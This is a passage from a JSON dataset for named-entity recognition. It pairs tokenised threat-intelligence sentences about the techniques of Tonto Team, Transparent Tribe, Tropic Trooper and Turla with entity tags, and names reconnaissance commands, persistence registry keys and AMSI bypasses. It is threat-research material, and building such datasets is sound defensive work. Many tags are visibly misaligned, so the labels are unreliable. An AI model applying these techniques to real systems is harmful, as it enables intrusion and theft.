"tokens": [ "Tonto", "Team", "has", "used", "a", "variety", "of", "credential", "dumping", "tools." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Tool", "O" ] }, { "tokens": [ "Tonto", "Team", "has", "used", "PowerShell", "to", "download", "additional", "payloads." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Tonto", "Team", "has", "used", "Python-based", "tools", "for", "execution." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tonto", "Team", "has", "delivered", "payloads", "via", "spearphishing", "attachments." ], "ner_tags": [ "B-SamFile", "B-HackOrg", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Tonto", "Team", "has", "used", "a", "first", "stage", "web", "shell", "after", "compromising", "a", "vulnerable", "Exchange", "server." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Transparent", "Tribe", "has", "registered", "domains", "to", "mimic", "file", "sharing,", "government,", "defense,", "and", "research", "websites", "for", "use", "in", "targeted", "campaigns." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "I-Idus", "O", "B-Idus", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-OffAct" ] }, { "tokens": [ "Transparent", "Tribe", "has", "compromised", "domains", "for", "use", "in", "targeted", "malicious", "campaigns." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "Transparent", "Tribe", "has", "used", "websites", "with", "malicious", "hyperlinks", "and", "iframes", "to", "infect", "targeted", "victims", "with", "Crimson,", "njRAT,", "and", "other", "malicious", "tools." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Transparent", "Tribe", "has", "set", "up", "websites", "with", "malicious", "hyperlinks", "and", "iframes", "to", "infect", "targeted", "victims", "with", "Crimson,", "njRAT,", "and", "other", "malicious", "tools." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Transparent", "Tribe", "has", "used", "dynamic", "DNS", "services", "to", "set", "up", "C2." ], "ner_tags": [ "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Transparent", "Tribe", "has", "dropped", "encoded", "executables", "on", "compromised", "hosts." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Transparent", "Tribe", "has", "crafted", "malicious", "files", "to", "exploit", "CVE-2012-0158", "and", "CVE-2010-3333", "for", "execution." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O" ] }, { "tokens": [ "Transparent", "Tribe", "can", "hide", "legitimate", "directories", "and", "replace", "them", "with", "malicious", "copies", "of", "the", "same", "name." ], "ner_tags": [ "O", "O", "O", "B-Purp", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Transparent", "Tribe", "has", "used", "weaponized", "documents", "in", "e-mail", "to", "compromise", "targeted", "systems." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Transparent", "Tribe", "has", "directed", "users", "to", "open", "URLs", "hosting", "malicious", "content." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Transparent", "Tribe", "can", "mimic", "legitimate", "Windows", "directories", "by", "using", "the", "same", "icons", "and", "names." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Features", "I-Features", "I-Features", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Transparent", "Tribe", "has", "sent", "spearphishing", "e-mails", "with", "attachments", "to", "deliver", "malicious", "payloads." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Transparent", "Tribe", "has", "embedded", "links", "to", "malicious", "downloads", "in", "e-mails." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Transparent", "Tribe", "has", "crafted", "VBS-based", "malicious", "documents." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Tropic", "Trooper", "has", "used", "SSL", "to", "connect", "to", "C2", "servers." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper", "has", "collected", "information", "automatically", "using", "the", "adversary's", "USBferry", "attack." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "Tropic", "Trooper", "has", "used", "a", "copy", "function", "to", "automatically", "exfiltrate", "sensitive", "data", "from", "air-gapped", "systems", "using", "USB", "storage." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper", "has", "been", "known", "to", "side-load", "DLLs", "using", "a", "valid", "version", "of", "a", "Windows", "Address", "Book", "and", "Windows", "Defender", "executable", "with", "one", "of", "their", "tools." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper's", "backdoor", "has", "communicated", "to", "the", "C2", "over", "the", "DNS", "protocol." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Tropic", "Trooper", "used", "shellcode", "with", "an", "XOR", "algorithm", "to", "decrypt", "a", "payload.", "Tropic", "Trooper", "also", "decrypted", "image", "files", "which", "contained", "a", "payload." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper", "has", "injected", "a", "DLL", "backdoor", "into", "dllhost.exe", "and", "svchost.exe." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Tropic", "Trooper", "has", "encrypted", "traffic", "with", "the", "C2", "to", "prevent", "network", "detection." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper", "has", "encrypted", "configuration", "files." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper", "has", "exfiltrated", "data", "using", "USB", "storage", "devices." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "Tropic", "Trooper", "has", "executed", "commands", "through", "Microsoft", "security", "vulnerabilities,", "including", "CVE-2017-11882,", "CVE-2018-0802,", "and", "CVE-2012-0158." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-Features", "O", "B-Features" ] }, { "tokens": [ "Tropic", "Trooper", "has", "deleted", "dropper", "files", "on", "an", "infected", "system", "using", "command", "scripts." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper", "has", "monitored", "files'", "modified", "time." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper", "has", "created", "a", "hidden", "directory", "under", "<code>C:\\ProgramData\\Apple\\Updates\\</code>", "and", "<code>C:\\Users\\Public\\Documents\\Flash\\</code>." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper", "has", "used", "a", "delivered", "trojan", "to", "download", "additional", "files." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper", "has", "used", "known", "administrator", "account", "credentials", "to", "execute", "the", "backdoor", "directly." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper", "has", "lured", "victims", "into", "executing", "malware", "via", "malicious", "e-mail", "attachments." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O" ] }, { "tokens": [ "Tropic", "Trooper", "has", "hidden", "payloads", "in", "Flash", "directories", "and", "fake", "installer", "files." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "Tropic", "Trooper", "has", "used", "multiple", "Windows", "APIs", "including", "HttpInitialize,", "HttpCreateHttpHandle,", "and", "HttpAddUrl." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Tropic", "Trooper", "used", "<code>pr</code>", "and", "an", "openly", "available", "tool", "to", "scan", "for", "open", "ports", "on", "target", "systems." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper", "used", "<code>netview</code>", "to", "scan", "target", "systems", "for", "shared", "resources." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper", "is", "capable", "of", "enumerating", "the", "running", "processes", "on", "the", "system", "using", "<code>pslist</code>." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper", "has", "created", "shortcuts", "in", "the", "Startup", "folder", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper", "has", "attempted", "to", "transfer", "USBferry", "from", "an", "infected", "USB", "device", "by", "copying", "an", "Autorun", "function", "to", "the", "target", "machine." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper", "can", "search", "for", "anti-virus", "software", "running", "on", "the", "system." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper's", "backdoor", "could", "list", "the", "infected", "system's", "installed", "software." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper", "sent", "spearphishing", "emails", "that", "contained", "malicious", "Microsoft", "Office", "and", "fake", "installer", "file", "attachments." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper", "has", "used", "base64", "encoding", "to", "hide", "command", "strings", "delivered", "from", "the", "C2." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper", "has", "used", "JPG", "files", "with", "encrypted", "payloads", "to", "mask", "their", "backdoor", "routines", "and", "evade", "detection." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper", "has", "detected", "a", "target", "system’s", "OS", "version", "and", "system", "volume", "information." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper", "has", "used", "scripts", "to", "collect", "the", "host's", "network", "topology." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper", "has", "tested", "if", "the", "localhost", "network", "is", "available", "and", "other", "connection", "capability", "on", "an", "infected", "system", "using", "command", "scripts." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "Tropic", "Trooper", "used", "<code>letmein</code>", "to", "scan", "for", "saved", "usernames", "on", "the", "target", "system." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper", "delivered", "malicious", "documents", "with", "the", "XLSX", "extension,", "typically", "used", "by", "OpenXML", "documents,", "but", "the", "file", "itself", "was", "actually", "an", "OLE", "(XLS)", "document." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper", "has", "used", "HTTP", "in", "communication", "with", "the", "C2." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper", "has", "started", "a", "web", "service", "in", "the", "target", "host", "and", "wait", "for", "the", "adversary", "to", "connect,", "acting", "as", "a", "web", "shell." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper", "has", "used", "Windows", "command", "scripts." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper", "has", "installed", "a", "service", "pointing", "to", "a", "malicious", "DLL", "dropped", "to", "disk." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Tropic", "Trooper", "has", "created", "the", "Registry", "key", "<code>HKCU\\Software\\Microsoft\\Windows", "NT\\CurrentVersion\\Winlogon\\Shell</code>", "and", "sets", "the", "value", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "encrypted", "files", "stolen", "from", "connected", "USB", "drives", "into", "a", "RAR", "file", "before", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "I-Way", "O", "O" ] }, { "tokens": [ "A", "Turla", "JavaScript", "backdoor", "has", "used", "Google", "Apps", "Script", "as", "its", "C2", "server." ], "ner_tags": [ "O", "B-Idus", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "may", "attempt", "to", "connect", "to", "systems", "within", "a", "victim's", "network", "using", "<code>net", "use</code>", "commands", "and", "a", "predefined", "list", "or", "collection", "of", "passwords." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "modified", "variables", "in", "kernel", "memory", "to", "turn", "off", "Driver", "Signature", "Enforcement", "after", "exploiting", "vulnerabilities", "that", "obtained", "kernel", "mode", "privileges." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "used", "encryption", "(including", "salted", "3DES", "via", "PowerSploit's", "<code>Out-EncryptedScript.ps1</code>),", "random", "variable", "names,", "and", "base64", "encoding", "to", "obfuscate", "PowerShell", "commands", "and", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "RPC", "backdoors", "can", "impersonate", "or", "steal", "process", "tokens", "before", "executing", "commands." ], "ner_tags": [ "B-Idus", "B-Tool", "B-SecTeam", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "used", "a", "custom", ".NET", "tool", "to", "collect", "documents", "from", "an", "organization's", "internal", "central", "database." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Tool", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "RPC", "backdoors", "can", "upload", "files", "from", "victim", "machines." ], "ner_tags": [ "B-Idus", "B-Tool", "B-SecTeam", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Turla", "RPC", "backdoors", "can", "collect", "files", "from", "USB", "thumb", "drives." ], "ner_tags": [ "B-Idus", "B-SamFile", "B-SecTeam", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "used", "a", "custom", "decryption", "routine,", "which", "pulls", "key", "and", "salt", "values", "from", "other", "artifacts", "such", "as", "a", "WMI", "filter", "or", "PowerShell", "Profile,", "to", "decode", "encrypted", "PowerShell", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Way", "B-Tool", "O", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "used", "a", "AMSI", "bypass,", "which", "patches", "the", "in-memory", "amsi.dll,", "in", "PowerShell", "scripts", "to", "bypass", "Windows", "antimalware", "products." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "B-Way", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "used", "<code>net", "user", "/domain</code>", "to", "enumerate", "domain", "accounts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "used", "<code>net", "group", "\"Domain", "Admins\"", "/domain</code>", "to", "identify", "domain", "administrators." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "infected", "victims", "using", "watering", "holes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Turla", "has", "used", "Metasploit", "to", "perform", "reflective", "DLL", "injection", "in", "order", "to", "escalate", "privileges." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "used", "WebDAV", "to", "upload", "stolen", "USB", "files", "to", "a", "cloud", "drive.", "Turla", "has", "also", "exfiltrated", "stolen", "files", "to", "OneDrive", "and", "4shared." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Turla", "has", "exploited", "vulnerabilities", "in", "the", "VBoxDrv.sys", "driver", "to", "obtain", "kernel", "mode", "privileges." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "surveys", "a", "system", "upon", "check-in", "to", "discover", "files", "in", "specific", "locations", "on", "the", "hard", "disk", "%TEMP%", "directory,", "the", "current", "user's", "desktop,", "the", "Program", "Files", "directory,", "and", "Recent.", "Turla", "RPC", "backdoors", "have", "also", "searched", "for", "files", "matching", "the", "<code>lPH*.dll</code>", "pattern." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "used", "the", "Registry", "to", "store", "encrypted", "and", "encoded", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "surveys", "a", "system", "upon", "check-in", "to", "discover", "Group", "Policy", "details", "using", "the", "<code>gpresult</code>", "command." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Based", "on", "comparison", "of", "Gazer", "versions,", "Turla", "made", "an", "effort", "to", "obfuscate", "strings", "in", "the", "malware", "that", "could", "be", "used", "as", "IoCs,", "including", "the", "mutex", "name", "and", "named", "pipe." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "used", "shellcode", "to", "download", "Meterpreter", "after", "compromising", "a", "victim." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "compromised", "internal", "network", "systems", "to", "act", "as", "a", "proxy", "to", "forward", "traffic", "to", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "used", "<code>tracert</code>", "to", "check", "internet", "connectivity." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "used", "various", "JavaScript-based", "backdoors." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Turla", "RPC", "backdoors", "can", "be", "used", "to", "transfer", "files", "to/from", "victim", "machines", "on", "the", "local", "network." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "B-SecTeam", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "used", "<code>net", "user</code>", "to", "enumerate", "local", "accounts", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "B-Purp", "O", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "abused", "local", "accounts", "that", "have", "the", "same", "password", "across", "the", "victim’s", "network." ], "ner_tags": [ "B-Idus", "O", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "used", "<code>net", "localgroup</code>", "and", "<code>net", "localgroup", "Administrators</code>", "to", "enumerate", "group", "information,", "including", "members", "of", "the", "local", "administrators", "group." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "used", "multiple", "backdoors", "which", "communicate", "with", "a", "C2", "server", "via", "email", "attachments." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "Turla", "has", "used", "spearphishing", "via", "a", "link", "to", "get", "users", "to", "download", "and", "run", "their", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "developed", "its", "own", "unique", "malware", "for", "use", "in", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "used", "malware", "obtained", "after", "compromising", "other", "threat", "actors,", "such", "as", "OilRig." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "I-HackOrg", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Turla", "has", "modify", "Registry", "values", "to", "store", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "and", "its", "RPC", "backdoors", "have", "used", "APIs", "calls", "for", "various", "tasks", "related", "to", "subverting", "AMSI", "and", "accessing", "then", "executing", "commands", "through", "RPC", "and/or", "named", "pipes." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "used", "<code>net", "accounts</code>", "and", "<code>net", "accounts", "/domain</code>", "to", "acquire", "password", "policy", "information." ], "ner_tags": [ "B-Idus", "O", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O" ] }, { "tokens": [ "Turla", "has", "used", "<code>fsutil", "fsinfo", "drives</code>", "to", "list", "connected", "drives." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "used", "PowerShell", "to", "execute", "commands/scripts,", "in", "some", "cases", "via", "a", "custom", "executable", "or", "code", "from", "Empire's", "PSInject.", "Turla", "has", "also", "used", "PowerShell", "scripts", "to", "load", "and", "execute", "malware", "in", "memory." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "used", "PowerShell", "profiles", "to", "maintain", "persistence", "on", "an", "infected", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Turla", "surveys", "a", "system", "upon", "check-in", "to", "discover", "running", "processes", "using", "the", "<code>tasklist", "/v</code>", "command.", "Turla", "RPC", "backdoors", "have", "also", "enumerated", "processes", "associated", "with", "specific", "open", "ports", "or", "named", "pipes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "also", "used", "PowerSploit's", "<code>Invoke-ReflectivePEInjection.ps1</code>", "to", "reflectively", "load", "a", "PowerShell", "payload", "into", "a", "random", "process", "on", "the", "victim", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "RPC", "backdoors", "have", "included", "local", "UPnP", "RPC", "proxies." ], "ner_tags": [ "B-Idus", "B-Tool", "O", "O", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "Turla", "has", "used", "IronPython", "scripts", "as", "part", "of", "the", "IronNetInjector", "toolchain", "to", "drop", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Turla", "surveys", "a", "system", "upon", "check-in", "to", "discover", "information", "in", "the", "Windows", "Registry", "with", "the", "<code>reg", "query</code>", "command.", "Turla", "has", "also", "retrieved", "PowerShell", "payloads", "hidden", "in", "Registry", "keys", "as", "well", "as", "checking", "keys", "associated", "with", "null", "session", "named", "pipes", "." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "Turla", "Javascript", "backdoor", "added", "a", "local_update_check", "value", "under", "the", "Registry", "key", "<code>HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run</code>", "to", "establish", "persistence.", "Additionally,", "a", "Turla", "custom", "executable", "containing", "Metasploit", "shellcode", "is", "saved", "to", "the", "Startup", "folder", "to", "gain", "persistence." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "surveys", "a", "system", 